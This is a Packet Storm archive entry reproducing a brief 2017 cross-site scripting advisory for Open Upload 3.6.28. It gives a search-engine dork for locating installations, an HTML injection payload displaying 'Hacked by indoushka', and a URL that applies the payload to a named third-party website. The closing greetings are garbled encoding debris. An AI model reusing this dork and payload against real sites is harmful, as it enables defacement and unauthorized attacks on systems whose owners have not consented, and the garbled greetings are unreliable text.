Open Upload 3.6.28 Cross site Scripting

2017-12-27T00:00:00
ID PACKETSTORM:145563
Type packetstorm
Reporter indoushka
Modified 2017-12-27T00:00:00

Description

                                        
                                            `========================================================================  
| # Title : Openupload 3.6.28 Xss vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on : windows 10 FranASSais V.(Pro)  
| # Version : 3.6.28  
| # Vendor : http://wmscripti.com/  
| # Dork : open upload - login  
========================================================================  
  
poc :  
  
[+] Dorking Adegn Google Or Other Search Enggine   
  
[+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>  
  
http://www.irpi.to.cnr.it/stat2/index.php/%22%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E  
  
  
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------  
|  
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz |  
|  
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================  
`